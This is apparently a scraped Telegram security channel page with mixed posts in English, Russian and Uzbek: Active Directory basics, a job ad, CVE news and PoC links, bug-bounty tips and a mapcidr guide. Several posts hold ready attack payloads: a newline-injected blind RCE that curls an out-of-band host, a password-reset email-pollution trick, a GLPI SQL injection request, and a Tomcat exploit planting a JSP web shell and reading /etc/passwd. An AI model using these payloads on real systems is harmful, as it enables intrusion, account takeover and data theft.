SecList for CyberStudents
239 subscribers
598 photos
24 videos
211 files
908 links
Think outside the box
Download Telegram
Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks. It is used to manage and organize computers, users, and resources within a network. AD provides authentication and authorization services, allowing administrators to control access to network resources efficiently.

Key Components of Active Directory:

1. Domain Controller (DC) – A server that stores AD data and handles authentication.

2. Organizational Units (OUs) – Logical containers for organizing users, groups, and computers.

3. Groups & Users – Define permissions and access control.

4. Group Policy (GPO) – Used to enforce security settings and configurations.

5. Forest & Domains – A hierarchical structure that organizes multiple AD domains.
👍1🔥1
Образование и опыт:
Опыт работы 2–5 лет в сфере сетевой безопасности.
Глубокие знания сетевых протоколов и технологий (BGP, OSPF, VLAN, IPsec).
Навыки и знания:
Администрирование и настройка SIEM-систем (Splunk, QRadar).
Опыт работы с WAF, DLP, PAM, IAM.
Работа с NGFW (Next-Gen Firewall) и межсетевыми экранами (FortiGate, Palo Alto, Cisco ASA).
Анализ уязвимостей и тестирование на проникновение (pentest).
Опыт работы с Linux/Windows на продвинутом уровне.
Желательные сертификаты:
Cisco CCNP Security
Fortinet NSE 4-7

@sherzodubaydullaev

Yoki Junior Network Engineer bo'lsa ham bo'ladi
Forwarded from OSINT
Индия начала зачистку OSINT-платформ

#OSINT #News

Власти Индии объявили охоту на OSINT-сервисы, которые занимаются сбором и продажей утечек, взломанных баз и даркнет-данных. В официальном заявлении отмечается, что подобные действия нарушают законы о персональных данных и представляют угрозу национальной безопасности.

⚠️ Под удар попали платформы, работающие с leaked data, dark web и hack dumps — теперь правоохранители и спецслужбы займутся их блокировкой и уголовным преследованием.

🔗 Подробнее: The420.in

LH | Новости | Курсы | OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
POC: https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main

Pre-Auth SQL Injection
CVE-2025-24799
Severity : Critical

#CVE
👍1
Forwarded from Brut Security (Emon Shaikh)
🔥Never forget to check for blind RCE!💥

I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:

;id | whoami & uname

But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE — still blocked.

Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?

Payload idea: Inject a newline before the actual payload:

attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun

(Use %0a for newline — URL encoded)

And boom — Blind RCE triggered! My server got the hit instantly.

Cybersecurity isn’t about effort — it’s about mindset. Deep thinking always wins over brute force.❤️
Password Reset Bypass Trick 🌀

Some poorly secured endpoints accept multiple email parameters.😳

Try this:

POST /passwordReset HTTP/1.1 
Content-Type: application/x-www-form-urlencoded 

[email protected]&[email protected]

Or in JSON:

{
  "email": ["[email protected]", "[email protected]"]
}

If the app sends the reset link to both emails… you’re in.
Now imagine if the victim is an admin — hello dashboard, hello bounty!💰

#bugbountytips
🔥You can find💥
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)🧐😎

target.com/hidden this page required authentication or redirect to /login page.

Try: target.com/login/hidden

OMG! Auth bypass
👏1
Apache Tomcat: Potential RCE
Severity : Critical
CVE-2025-24813

POC: https://github.com/MuhammadWaseem29/CVE-2025-24813

#CVE
🚨 Снова #GLPI - Критическая уязвимость SQL-инъекции без аутентификации через /index.php/ajax/ CVE-2025-24799 и CVE-2025-24801

Позволяет удалённому атакующему выполнять произвольные SQL-запросы и потенциально эскалировать до RCE.

🛠️ Затрагивает версии до 10.0.18
Исправлено в версии GLPI 10.0.18

🔍 PoC:

POST /index.php/ajax/ HTTP/1.1
Host: glpi
User-Agent: python-requests/2.32.3
Content-Type: application/xml
Content-Length: 232

<?xml version="1.0" encoding="UTF-8"?>
    <xml>
    <QUERY>get_params</QUERY>
    <deviceid>', IF((1=1),(select sleep(5)),1), 0, 0, 0, 0, 0, 0);#</deviceid>
    <content>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</content>
</xml>

🧪 SQLi-сканер:
👉 https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main

📚 Подробности и пост-эксплуатация до RCE:
👉 https://blog.lexfo.fr/glpi-sql-to-rce.html

‼️ Если используете GLPI — обновитесь немедленно и проверьте логи на предмет активности на /ajax/.

#CVE
👍1
Forwarded from SecuriXy.kz
🔥 Path Equivalence в Apache Tomcat CVE-2025-24813
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.

💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99

🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).

📦 PoC:

curl -X PUT "https://target.com/uploads/../webapps/ROOT/updates.jsp" \
-H "Content-Type: application/x-jsp" \
--data-raw '<%@ page import="java.io.*" %>
<html><body>
<form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form>
<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %>
</body></html>' -i


📥 Доступ к вебшеллу:

curl "https://target.com/updates.jsp?cmd=cat/etc/passwd" -i


📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg

‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.

Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.
Forwarded from SecuriXy.kz
💣 pgAdmin RCE CVE-2025-2945 -
Удалённое выполнение кода (RCE) в одном из самых популярных GUI-интерфейсов для PostgreSQL.

Актуально для всех версий pgAdmin ≤ 9.1

🧠 Уязвимость кроется в eval() - опасной функции, интерпретирующей строки как исполняемый код.

🎯 Уязвимые endpoints:

/sqleditor/query_tool/download/<int:trans_id>

/cloud/deploy

📌 Условия эксплуатации:
Нужна аутентификация
POST-запросы к указанным маршрутам

📉 Потенциал:
Полный захват сервера, выполнение произвольных команд, возможность lateral movement внутри инфраструктуры.

🔗 Подробнее: 👉 https://py0zz1.tistory.com/entry/Remote-Code-Execution-Vulnerability-in-pgAdmin-CVE-2025-2945

https://www.youtube.com/watch?v=V2WzCmRct7s
👍1
Forwarded from Codeby
🗺🍺 mapcidr — универсальный инструмент для работы с IP-адресами и CIDR-диапазонами. Разработан для упрощения распределения нагрузки при массовом сканировании. Его можно использовать как в качестве библиотеки, так и в качестве независимого инструмента командной строки. Установка: go install -v github.com/projectdiscovery/mapcidr/cmd/mapcidr@latest.

📊 Функциональность
⏺️Генерация полного списка IP-адресов из заданного CIDR-диапазона;
⏺️Разделение CIDR на более мелкие подсети (по количеству подсетей или хостов);
⏺️Объединение IP-адресов или CIDR в более крупные подсети;
⏺️Фильтрация IP-адресов по заданным критериям;
⏺️Преобразование IP-адресов в различные форматы;
⏺️Поддержка IPv4 и IPv6.

ℹ️ Примеры использования
Генерация списка IP-адресов для заданного CIDR или диапазона IP:
mapcidr -cidr 192.168.0.0/24
echo "192.168.0.0-192.168.0.5" | mapcidr


Разделение заданного CIDR на подсети по заданному количеству CIDR(-sbc 10):
mapcidr -cidr 173.0.84.0/24 -sbc 10 -silent


Разделение заданного CIDR на подсети по по количеству хостов в каждой из них(-sbh 20000):
mapcidr -cidr 173.0.84.0/16 -sbh 20000 -silent


Идеальное разделение возможно только в том случае, если желаемое количество сегментов или хостов в подсети является степенью двойки. В противном случае инструмент попытается автоматически найти наилучшую стратегию разделения для достижения желаемого результата.

Представление заданного IP-адреса в десяти поддерживаемых уникальных форматах
echo 192.168.1.154 | mapcidr -if 0 -silent
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from AppSec Guy
CVE yoki CWE dasturlari tugatilishi yaxshigina impact ko'rsatadi, AppSecga ayniqsa.

Yangi chiqqan vulnerability lar track qilinib unga raqami berilmaydi, masalan CVE-2025-12345 qilib. O'zi bundan muammo yo'qqa o'xshaydi Shaptolini shu versiyasida ATO deb yozib ketaveramiz vulnerability nomini, lekin baribir confusion bo'ladi.

Impact to'g'ridan-tog'ri bizga bilinmaydi, bundan ko'proq U.S. foydalanadi o'zini assetlarida.

Yana CVE database bilan ishlaydigan Vulnerability Scanner lar ancha qiynaladi.

Lekin CWE tugatilishi katta "chaos" bo'lsa kerak) OWASP faqat 10 ta vulnerability type ko'rsatadi, vulnerability ni mana shu deb ko'rsatgani CWE yaxshi.

Hullas bu framework bilan standartlar edi dunyo shunga qarab ish qiladigan, endi aniq narsa bo'lmasa tartibsizlik bo'ladi.

P.S. CVE assignment yoniq qolarkan)

@AppSec_guy